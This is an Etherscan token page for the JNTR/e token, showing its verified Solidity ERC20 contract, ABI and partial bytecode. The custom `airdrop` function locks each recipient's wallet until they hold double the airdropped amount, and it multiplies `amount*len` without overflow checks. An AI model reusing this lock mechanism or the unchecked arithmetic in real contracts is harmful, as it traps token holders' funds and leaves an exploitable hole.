ETH Price: $3,669.73 (+18.68%)
Gas: 10 Gwei

Token

JNTR/e (JNTR/e)
 

Overview

Max Total Supply

911,160.7917130757805 JNTR/e

Holders

1,261 (0.00%)

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Filtered by Token Holder
Uniswap Protocol: UNI token
Balance
125 JNTR/e

Value
$0.00
0x1f9840a85d5af5bf1d1762f925bdaddc4201f984
Loading...
Loading
Loading...
Loading
Loading...
Loading

OVERVIEW

Jointer created a fund of funds syndication economy utilizing the blockchain while providing uncorrelated returns, diversification, and unlimited liquidity. JNTR/e has a 1:1 relationship with JNTR.

# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
ERC20Token

Compiler Version
v0.5.16+commit.9c3226ce

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, None license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2020-10-08
*/

pragma solidity 0.5.16;

interface IERC20 {
  /**
   * @dev Returns the amount of tokens in existence.
   */
  function totalSupply() external view returns (uint256);

  /**
   * @dev Returns the token decimals.
   */
  function decimals() external view returns (uint8);

  /**
   * @dev Returns the token symbol.
   */
  function symbol() external view returns (string memory);

  /**
  * @dev Returns the token name.
  */
  function name() external view returns (string memory);

  /**
   * @dev Returns the amount of tokens owned by `account`.
   */
  function balanceOf(address account) external view returns (uint256);

  /**
   * @dev Moves `amount` tokens from the caller's account to `recipient`.
   *
   * Returns a boolean value indicating whether the operation succeeded.
   *
   * Emits a {Transfer} event.
   */
  function transfer(address recipient, uint256 amount) external returns (bool);

  /**
   * @dev Returns the remaining number of tokens that `spender` will be
   * allowed to spend on behalf of `owner` through {transferFrom}. This is
   * zero by default.
   *
   * This value changes when {approve} or {transferFrom} are called.
   */
  function allowance(address _owner, address spender) external view returns (uint256);

  /**
   * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
   *
   * Returns a boolean value indicating whether the operation succeeded.
   *
   * IMPORTANT: Beware that changing an allowance with this method brings the risk
   * that someone may use both the old and the new allowance by unfortunate
   * transaction ordering. One possible solution to mitigate this race
   * condition is to first reduce the spender's allowance to 0 and set the
   * desired value afterwards:
   * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
   *
   * Emits an {Approval} event.
   */
  function approve(address spender, uint256 amount) external returns (bool);

  /**
   * @dev Moves `amount` tokens from `sender` to `recipient` using the
   * allowance mechanism. `amount` is then deducted from the caller's
   * allowance.
   *
   * Returns a boolean value indicating whether the operation succeeded.
   *
   * Emits a {Transfer} event.
   */
  function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);

  /**
   * @dev Emitted when `value` tokens are moved from one account (`from`) to
   * another (`to`).
   *
   * Note that `value` may be zero.
   */
  event Transfer(address indexed from, address indexed to, uint256 value);

  /**
   * @dev Emitted when the allowance of a `spender` for an `owner` is set by
   * a call to {approve}. `value` is the new allowance.
   */
  event Approval(address indexed owner, address indexed spender, uint256 value);
}

/*
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with GSN meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
contract Context {
  // Empty internal constructor, to prevent people from mistakenly deploying
  // an instance of this contract, which should be used via inheritance.
  constructor () internal { }

  function _msgSender() internal view returns (address payable) {
    return msg.sender;
  }

  function _msgData() internal view returns (bytes memory) {
    this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
    return msg.data;
  }
}

/**
 * @dev Wrappers over Solidity's arithmetic operations with added overflow
 * checks.
 *
 * Arithmetic operations in Solidity wrap on overflow. This can easily result
 * in bugs, because programmers usually assume that an overflow raises an
 * error, which is the standard behavior in high level programming languages.
 * `SafeMath` restores this intuition by reverting the transaction when an
 * operation overflows.
 *
 * Using this library instead of the unchecked operations eliminates an entire
 * class of bugs, so it's recommended to use it always.
 */
library SafeMath {
  /**
   * @dev Returns the addition of two unsigned integers, reverting on
   * overflow.
   *
   * Counterpart to Solidity's `+` operator.
   *
   * Requirements:
   * - Addition cannot overflow.
   */
  function add(uint256 a, uint256 b) internal pure returns (uint256) {
    uint256 c = a + b;
    require(c >= a, "SafeMath: addition overflow");

    return c;
  }

  /**
   * @dev Returns the subtraction of two unsigned integers, reverting on
   * overflow (when the result is negative).
   *
   * Counterpart to Solidity's `-` operator.
   *
   * Requirements:
   * - Subtraction cannot overflow.
   */
  function sub(uint256 a, uint256 b) internal pure returns (uint256) {
    return sub(a, b, "SafeMath: subtraction overflow");
  }

  /**
   * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
   * overflow (when the result is negative).
   *
   * Counterpart to Solidity's `-` operator.
   *
   * Requirements:
   * - Subtraction cannot overflow.
   */
  function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
    require(b <= a, errorMessage);
    uint256 c = a - b;

    return c;
  }

  /**
   * @dev Returns the multiplication of two unsigned integers, reverting on
   * overflow.
   *
   * Counterpart to Solidity's `*` operator.
   *
   * Requirements:
   * - Multiplication cannot overflow.
   */
  function mul(uint256 a, uint256 b) internal pure returns (uint256) {
    // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
    // benefit is lost if 'b' is also tested.
    // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
    if (a == 0) {
      return 0;
    }

    uint256 c = a * b;
    require(c / a == b, "SafeMath: multiplication overflow");

    return c;
  }

  /**
   * @dev Returns the integer division of two unsigned integers. Reverts on
   * division by zero. The result is rounded towards zero.
   *
   * Counterpart to Solidity's `/` operator. Note: this function uses a
   * `revert` opcode (which leaves remaining gas untouched) while Solidity
   * uses an invalid opcode to revert (consuming all remaining gas).
   *
   * Requirements:
   * - The divisor cannot be zero.
   */
  function div(uint256 a, uint256 b) internal pure returns (uint256) {
    return div(a, b, "SafeMath: division by zero");
  }

  /**
   * @dev Returns the integer division of two unsigned integers. Reverts with custom message on
   * division by zero. The result is rounded towards zero.
   *
   * Counterpart to Solidity's `/` operator. Note: this function uses a
   * `revert` opcode (which leaves remaining gas untouched) while Solidity
   * uses an invalid opcode to revert (consuming all remaining gas).
   *
   * Requirements:
   * - The divisor cannot be zero.
   */
  function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
    // Solidity only automatically asserts when dividing by 0
    require(b > 0, errorMessage);
    uint256 c = a / b;
    // assert(a == b * c + a % b); // There is no case in which this doesn't hold

    return c;
  }

  /**
   * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
   * Reverts when dividing by zero.
   *
   * Counterpart to Solidity's `%` operator. This function uses a `revert`
   * opcode (which leaves remaining gas untouched) while Solidity uses an
   * invalid opcode to revert (consuming all remaining gas).
   *
   * Requirements:
   * - The divisor cannot be zero.
   */
  function mod(uint256 a, uint256 b) internal pure returns (uint256) {
    return mod(a, b, "SafeMath: modulo by zero");
  }

  /**
   * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
   * Reverts with custom message when dividing by zero.
   *
   * Counterpart to Solidity's `%` operator. This function uses a `revert`
   * opcode (which leaves remaining gas untouched) while Solidity uses an
   * invalid opcode to revert (consuming all remaining gas).
   *
   * Requirements:
   * - The divisor cannot be zero.
   */
  function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
    require(b != 0, errorMessage);
    return a % b;
  }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
contract Ownable is Context {
  address private _owner;

  event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

  /**
   * @dev Initializes the contract setting the deployer as the initial owner.
   */
  constructor () internal {
    //address msgSender = _msgSender();
    _owner = _msgSender();
    emit OwnershipTransferred(address(0), _owner);
  }

  /**
   * @dev Returns the address of the current owner.
   */
  function owner() public view returns (address) {
    return _owner;
  }

  /**
   * @dev Throws if called by any account other than the owner.
   */
  modifier onlyOwner() {
    require(_owner == _msgSender(), "Ownable: caller is not the owner");
    _;
  }

  /**
   * @dev Leaves the contract without owner. It will not be possible to call
   * `onlyOwner` functions anymore. Can only be called by the current owner.
   *
   * NOTE: Renouncing ownership will leave the contract without an owner,
   * thereby removing any functionality that is only available to the owner.
   */
  function renounceOwnership() public onlyOwner {
    emit OwnershipTransferred(_owner, address(0));
    _owner = address(0);
  }

  /**
   * @dev Transfers ownership of the contract to a new account (`newOwner`).
   * Can only be called by the current owner.
   */
  function transferOwnership(address newOwner) public onlyOwner {
    _transferOwnership(newOwner);
  }

  /**
   * @dev Transfers ownership of the contract to a new account (`newOwner`).
   */
  function _transferOwnership(address newOwner) internal {
    require(newOwner != address(0), "Ownable: new owner is the zero address");
    emit OwnershipTransferred(_owner, newOwner);
    _owner = newOwner;
  }
}

contract ERC20Token is Context, IERC20, Ownable {
  using SafeMath for uint256;

  mapping(address => bool) public gateways; // different gateways will be used for different pairs (chains)
  address public airdrop_maker;
  uint256 public unlock_amount;
  
  mapping (address => bool) public locked;
  mapping (address => uint256) private _balances;

  mapping (address => mapping (address => uint256)) private _allowances;

  uint256 private _totalSupply;
  uint8 private _decimals;
  string private _symbol;
  string private _name;

  event ChangeGateway(address gateway, bool active);

  /**
   * @dev Throws if called by any account other than the gateway.
   */
  modifier onlyGateway() {
    require(gateways[_msgSender()], "Caller is not the gateway");
    _;
  }

  constructor() public {
    _name = "JNTR/e";
    _symbol = "JNTR/e";
    _decimals = 18;
    _totalSupply = 0;
  }

  function changeGateway(address gateway, bool active) external onlyOwner returns(bool) {
    gateways[gateway] = active;
    emit ChangeGateway(gateway, active);
    return true;
  }

  function setAirdropMaker(address _addr) external onlyOwner returns(bool) {
    airdrop_maker = _addr;
    return true;
  }
  
  function airdrop(address[] calldata recipients, uint256 amount) external returns(bool) {
    require(msg.sender == airdrop_maker, "Not airdrop maker");
    uint256 len = recipients.length;
    address sender = msg.sender;
    _balances[sender] = _balances[sender].sub(amount*len, "BEP20: transfer amount exceeds balance");

    while (len > 0) {
      len--;
      address recipient = recipients[len];
      locked[recipient] = true;
      _balances[recipient] = _balances[recipient].add(amount);
      emit Transfer(sender, recipient, amount);
    }
    unlock_amount = amount * 2;
    return true;
  }
  
  /**
   * @dev Returns the token decimals.
   */
  function decimals() external view returns (uint8) {
    return _decimals;
  }

  /**
   * @dev Returns the token symbol.
   */
  function symbol() external view returns (string memory) {
    return _symbol;
  }

  /**
  * @dev Returns the token name.
  */
  function name() external view returns (string memory) {
    return _name;
  }

  /**
   * @dev See {BEP20-totalSupply}.
   */
  function totalSupply() external view returns (uint256) {
    return _totalSupply;
  }

  /**
   * @dev See {BEP20-balanceOf}.
   */
  function balanceOf(address account) external view returns (uint256) {
    return _balances[account];
  }

  /**
   * @dev See {BEP20-transfer}.
   *
   * Requirements:
   *
   * - `recipient` cannot be the zero address.
   * - the caller must have a balance of at least `amount`.
   */
  function transfer(address recipient, uint256 amount) external returns (bool) {
    //if (msg.sender == airdrop_maker) locked[recipient] = true;
    _transfer(_msgSender(), recipient, amount);
    return true;
  }

  /**
   * @dev See {BEP20-allowance}.
   */
  function allowance(address owner, address spender) external view returns (uint256) {
    return _allowances[owner][spender];
  }

  /**
   * @dev See {BEP20-approve}.
   *
   * Requirements:
   *
   * - `spender` cannot be the zero address.
   */
  function approve(address spender, uint256 amount) external returns (bool) {
    _approve(_msgSender(), spender, amount);
    return true;
  }

  /**
   * @dev See {BEP20-transferFrom}.
   *
   * Emits an {Approval} event indicating the updated allowance. This is not
   * required by the EIP. See the note at the beginning of {BEP20};
   *
   * Requirements:
   * - `sender` and `recipient` cannot be the zero address.
   * - `sender` must have a balance of at least `amount`.
   * - the caller must have allowance for `sender`'s tokens of at least
   * `amount`.
   */
  function transferFrom(address sender, address recipient, uint256 amount) external returns (bool) {
    _transfer(sender, recipient, amount);
    _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "BEP20: transfer amount exceeds allowance"));
    return true;
  }

  /**
   * @dev Atomically increases the allowance granted to `spender` by the caller.
   *
   * This is an alternative to {approve} that can be used as a mitigation for
   * problems described in {BEP20-approve}.
   *
   * Emits an {Approval} event indicating the updated allowance.
   *
   * Requirements:
   *
   * - `spender` cannot be the zero address.
   */
  function increaseAllowance(address spender, uint256 addedValue) public returns (bool) {
    _approve(_msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue));
    return true;
  }

  /**
   * @dev Atomically decreases the allowance granted to `spender` by the caller.
   *
   * This is an alternative to {approve} that can be used as a mitigation for
   * problems described in {BEP20-approve}.
   *
   * Emits an {Approval} event indicating the updated allowance.
   *
   * Requirements:
   *
   * - `spender` cannot be the zero address.
   * - `spender` must have allowance for the caller of at least
   * `subtractedValue`.
   */
  function decreaseAllowance(address spender, uint256 subtractedValue) public returns (bool) {
    _approve(_msgSender(), spender, _allowances[_msgSender()][spender].sub(subtractedValue, "BEP20: decreased allowance below zero"));
    return true;
  }

  /**
   * @dev Creates `amount` tokens and assigns them to `msg.sender`, increasing
   * the total supply.
   *
   * Requirements
   *
   * - `msg.sender` must be the token owner
   */
  function mint(address to, uint256 amount) public onlyGateway returns (bool) {
    _mint(to, amount);
    return true;
  }

  /**
   * @dev Moves tokens `amount` from `sender` to `recipient`.
   *
   * This is internal function is equivalent to {transfer}, and can be used to
   * e.g. implement automatic token fees, slashing mechanisms, etc.
   *
   * Emits a {Transfer} event.
   *
   * Requirements:
   *
   * - `sender` cannot be the zero address.
   * - `recipient` cannot be the zero address.
   * - `sender` must have a balance of at least `amount`.
   */
  function _transfer(address sender, address recipient, uint256 amount) internal {
    require(sender != address(0), "BEP20: transfer from the zero address");
    require(recipient != address(0), "BEP20: transfer to the zero address");
    if (locked[sender]) {
        require(_balances[sender] >= unlock_amount, "To unlock your wallet, you have to double the airdropped amount.");
        locked[sender] = false;
    }

    _balances[sender] = _balances[sender].sub(amount, "BEP20: transfer amount exceeds balance");
    _balances[recipient] = _balances[recipient].add(amount);

    emit Transfer(sender, recipient, amount);
  }

  /** @dev Creates `amount` tokens and assigns them to `account`, increasing
   * the total supply.
   *
   * Emits a {Transfer} event with `from` set to the zero address.
   *
   * Requirements
   *
   * - `to` cannot be the zero address.
   */
  function _mint(address account, uint256 amount) internal {
    require(account != address(0), "BEP20: mint to the zero address");

    _totalSupply = _totalSupply.add(amount);
    _balances[account] = _balances[account].add(amount);
    emit Transfer(address(0), account, amount);
  }

  /**
   * @dev Destroys `amount` tokens from `account`, reducing the
   * total supply.
   *
   * Emits a {Transfer} event with `to` set to the zero address.
   *
   * Requirements
   *
   * - `account` cannot be the zero address.
   * - `account` must have at least `amount` tokens.
   */
  function _burn(address account, uint256 amount) internal {
    require(account != address(0), "BEP20: burn from the zero address");

    _balances[account] = _balances[account].sub(amount, "BEP20: burn amount exceeds balance");
    _totalSupply = _totalSupply.sub(amount);
    emit Transfer(account, address(0), amount);
  }

  /**
   * @dev Sets `amount` as the allowance of `spender` over the `owner`s tokens.
   *
   * This is internal function is equivalent to `approve`, and can be used to
   * e.g. set automatic allowances for certain subsystems, etc.
   *
   * Emits an {Approval} event.
   *
   * Requirements:
   *
   * - `owner` cannot be the zero address.
   * - `spender` cannot be the zero address.
   */
  function _approve(address owner, address spender, uint256 amount) internal {
    require(owner != address(0), "BEP20: approve from the zero address");
    require(spender != address(0), "BEP20: approve to the zero address");

    _allowances[owner][spender] = amount;
    emit Approval(owner, spender, amount);
  }

  /**
   * @dev Destroys `amount` tokens from `account`.`amount` is then deducted
   * from the caller's allowance.
   *
   * See {_burn} and {_approve}.
   */
  function _burnFrom(address account, uint256 amount) internal {
    _burn(account, amount);
    _approve(account, _msgSender(), _allowances[account][_msgSender()].sub(amount, "BEP20: burn amount exceeds allowance"));
  }

  function burnFrom(address account, uint256 amount) external returns(bool) {
    _burnFrom(account, amount);
    return true;
  }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"payable":false,"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"gateway","type":"address"},{"indexed":false,"internalType":"bool","name":"active","type":"bool"}],"name":"ChangeGateway","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"constant":false,"inputs":[{"internalType":"address[]","name":"recipients","type":"address[]"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"airdrop","outputs":[{"internalType":"bool","name":"","type":"bool"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"airdrop_maker","outputs":[{"internalType":"address","name":"","type":"address"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burnFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[{"internalType":"address","name":"gateway","type":"address"},{"internalType":"bool","name":"active","type":"bool"}],"name":"changeGateway","outputs":[{"internalType":"bool","name":"","type":"bool"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"gateways","outputs":[{"internalType":"bool","name":"","type":"bool"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"locked","outputs":[{"internalType":"bool","name":"","type":"bool"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"mint","outputs":[{"internalType":"bool","name":"","type":"bool"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[],"name":"renounceOwnership","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[{"internalType":"address","name":"_addr","type":"address"}],"name":"setAirdropMaker","outputs":[{"internalType":"bool","name":"","type":"bool"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"unlock_amount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"}]

60806040523480156200001157600080fd5b50620000256001600160e01b03620000e516565b600080546001600160a01b0319166001600160a01b03928316178082556040519216917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908290a3604080518082019091526006808252654a4e54522f6560d01b60209092019182526200009c91600a91620000ea565b50604080518082019091526006808252654a4e54522f6560d01b6020909201918252620000cc91600991620000ea565b506008805460ff1916601217905560006007556200018c565b335b90565b828054600181600116156101000203166002900490600052602060002090601f016020900481019282601f106200012d57805160ff19168380011785556200015d565b828001600101855582156200015d579182015b828111156200015d57825182559160200191906001019062000140565b506200016b9291506200016f565b5090565b620000e791905b808211156200016b576000815560010162000176565b6115ab806200019c6000396000f3fe608060405234801561001057600080fd5b506004361061014d5760003560e01c80638da5cb5b116100c3578063c204642c1161007c578063c204642c146103eb578063cbf9fe5f1461045b578063dd62ed3e14610481578063deb06ea4146104af578063df2efc85146104dd578063f2fde38b146105035761014d565b80638da5cb5b146103395780639022c19c1461035d57806395d89b4114610383578063a457c2d71461038b578063a9059cbb146103b7578063b76b70b8146103e35761014d565b8063313ce56711610115578063313ce56714610267578063395093511461028557806340c10f19146102b157806370a08231146102dd578063715018a61461030357806379cc67901461030d5761014d565b806306fdde0314610152578063095ea7b3146101cf57806318160ddd1461020f57806323b872dd1461022957806330d6cb3c1461025f575b600080fd5b61015a610529565b6040805160208082528351818301528351919283929083019185019080838360005b8381101561019457818101518382015260200161017c565b50505050905090810190601f1680156101c15780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b6101fb600480360360408110156101e557600080fd5b506001600160a01b0381351690602001356105bf565b604080519115158252519081900360200190f35b6102176105dc565b60408051918252519081900360200190f35b6101fb6004803603606081101561023f57600080fd5b506001600160a01b038135811691602081013590911690604001356105e2565b61021761066f565b61026f610675565b6040805160ff9092168252519081900360200190f35b6101fb6004803603604081101561029b57600080fd5b506001600160a01b03813516906020013561067e565b6101fb600480360360408110156102c757600080fd5b506001600160a01b0381351690602001356106d2565b610217600480360360208110156102f357600080fd5b50356001600160a01b0316610758565b61030b610773565b005b6101fb6004803603604081101561032357600080fd5b506001600160a01b038135169060200135610815565b610341610821565b604080516001600160a01b039092168252519081900360200190f35b6101fb6004803603602081101561037357600080fd5b50356001600160a01b0316610830565b61015a610845565b6101fb600480360360408110156103a157600080fd5b506001600160a01b0381351690602001356108a6565b6101fb600480360360408110156103cd57600080fd5b506001600160a01b038135169060200135610914565b610341610928565b6101fb6004803603604081101561040157600080fd5b81019060208101813564010000000081111561041c57600080fd5b82018360208201111561042e57600080fd5b8035906020019184602083028401116401000000008311171561045057600080fd5b919350915035610937565b6101fb6004803603602081101561047157600080fd5b50356001600160a01b0316610aaf565b6102176004803603604081101561049757600080fd5b506001600160a01b0381358116916020013516610ac4565b6101fb600480360360408110156104c557600080fd5b506001600160a01b0381351690602001351515610aef565b6101fb600480360360208110156104f357600080fd5b50356001600160a01b0316610bb2565b61030b6004803603602081101561051957600080fd5b50356001600160a01b0316610c31565b600a8054604080516020601f60026000196101006001881615020190951694909404938401819004810282018101909252828152606093909290918301828280156105b55780601f1061058a576101008083540402835291602001916105b5565b820191906000526020600020905b81548152906001019060200180831161059857829003601f168201915b5050505050905090565b60006105d36105cc610c95565b8484610c99565b50600192915050565b60075490565b60006105ef848484610d85565b610665846105fb610c95565b610660856040518060600160405280602881526020016113d8602891396001600160a01b038a16600090815260066020526040812090610639610c95565b6001600160a01b03168152602081019190915260400160002054919063ffffffff610f6c16565b610c99565b5060019392505050565b60035481565b60085460ff1690565b60006105d361068b610c95565b84610660856006600061069c610c95565b6001600160a01b03908116825260208083019390935260409182016000908120918c16815292529020549063ffffffff61100316565b6000600160006106e0610c95565b6001600160a01b0316815260208101919091526040016000205460ff1661074e576040805162461bcd60e51b815260206004820152601960248201527f43616c6c6572206973206e6f7420746865206761746577617900000000000000604482015290519081900360640190fd5b6105d38383611064565b6001600160a01b031660009081526005602052604090205490565b61077b610c95565b6000546001600160a01b039081169116146107cb576040805162461bcd60e51b81526020600482018190526024820152600080516020611440833981519152604482015290519081900360640190fd5b600080546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3600080546001600160a01b0319169055565b60006105d38383611144565b6000546001600160a01b031690565b60016020526000908152604090205460ff1681565b60098054604080516020601f60026000196101006001881615020190951694909404938401819004810282018101909252828152606093909290918301828280156105b55780601f1061058a576101008083540402835291602001916105b5565b60006105d36108b3610c95565b84610660856040518060600160405280602581526020016114c960259139600660006108dd610c95565b6001600160a01b03908116825260208083019390935260409182016000908120918d1681529252902054919063ffffffff610f6c16565b60006105d3610921610c95565b8484610d85565b6002546001600160a01b031681565b6002546000906001600160a01b0316331461098d576040805162461bcd60e51b81526020600482015260116024820152702737ba1030b4b9323937b81036b0b5b2b960791b604482015290519081900360640190fd5b60408051606081019091526026808252849133916109d7918685029161146060208301396001600160a01b038416600090815260056020526040902054919063ffffffff610f6c16565b6001600160a01b0382166000908152600560205260409020555b8115610a9e57600019909101906000868684818110610a0c57fe5b602090810292909201356001600160a01b031660008181526004845260408082208054600160ff1990911617905560059094529290922054919250610a5391905086611003565b6001600160a01b03808316600081815260056020908152604091829020949094558051898152905191939286169260008051602061148683398151915292918290030190a3506109f1565b505050600202600355506001919050565b60046020526000908152604090205460ff1681565b6001600160a01b03918216600090815260066020908152604080832093909416825291909152205490565b6000610af9610c95565b6000546001600160a01b03908116911614610b49576040805162461bcd60e51b81526020600482018190526024820152600080516020611440833981519152604482015290519081900360640190fd5b6001600160a01b038316600081815260016020908152604091829020805460ff191686151590811790915582519384529083015280517f25534777c807048646dcdb9b9c7c447c9b13f5374557a5182baec147da8d37839281900390910190a150600192915050565b6000610bbc610c95565b6000546001600160a01b03908116911614610c0c576040805162461bcd60e51b81526020600482018190526024820152600080516020611440833981519152604482015290519081900360640190fd5b50600280546001600160a01b0383166001600160a01b03199091161790556001919050565b610c39610c95565b6000546001600160a01b03908116911614610c89576040805162461bcd60e51b81526020600482018190526024820152600080516020611440833981519152604482015290519081900360640190fd5b610c928161119c565b50565b3390565b6001600160a01b038316610cde5760405162461bcd60e51b815260040180806020018281038252602481526020018061138e6024913960400191505060405180910390fd5b6001600160a01b038216610d235760405162461bcd60e51b81526004018080602001828103825260228152602001806115556022913960400191505060405180910390fd5b6001600160a01b03808416600081815260066020908152604080832094871680845294825291829020859055815185815291517f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9259281900390910190a3505050565b6001600160a01b038316610dca5760405162461bcd60e51b81526004018080602001828103825260258152602001806113696025913960400191505060405180910390fd5b6001600160a01b038216610e0f5760405162461bcd60e51b81526004018080602001828103825260238152602001806114a66023913960400191505060405180910390fd5b6001600160a01b03831660009081526004602052604090205460ff1615610eaa576003546001600160a01b0384166000908152600560205260409020541015610e895760405162461bcd60e51b81526004018080602001828103825260408152602001806114006040913960400191505060405180910390fd5b6001600160a01b0383166000908152600460205260409020805460ff191690555b610eed81604051806060016040528060268152602001611460602691396001600160a01b038616600090815260056020526040902054919063ffffffff610f6c16565b6001600160a01b038085166000908152600560205260408082209390935590841681522054610f22908263ffffffff61100316565b6001600160a01b03808416600081815260056020908152604091829020949094558051858152905191939287169260008051602061148683398151915292918290030190a3505050565b60008184841115610ffb5760405162461bcd60e51b81526004018080602001828103825283818151815260200191508051906020019080838360005b83811015610fc0578181015183820152602001610fa8565b50505050905090810190601f168015610fed5780820380516001836020036101000a031916815260200191505b509250505060405180910390fd5b505050900390565b60008282018381101561105d576040805162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f770000000000604482015290519081900360640190fd5b9392505050565b6001600160a01b0382166110bf576040805162461bcd60e51b815260206004820152601f60248201527f42455032303a206d696e7420746f20746865207a65726f206164647265737300604482015290519081900360640190fd5b6007546110d2908263ffffffff61100316565b6007556001600160a01b0382166000908152600560205260409020546110fe908263ffffffff61100316565b6001600160a01b03831660008181526005602090815260408083209490945583518581529351929391926000805160206114868339815191529281900390910190a35050565b61114e828261123c565b6111988261115a610c95565b610660846040518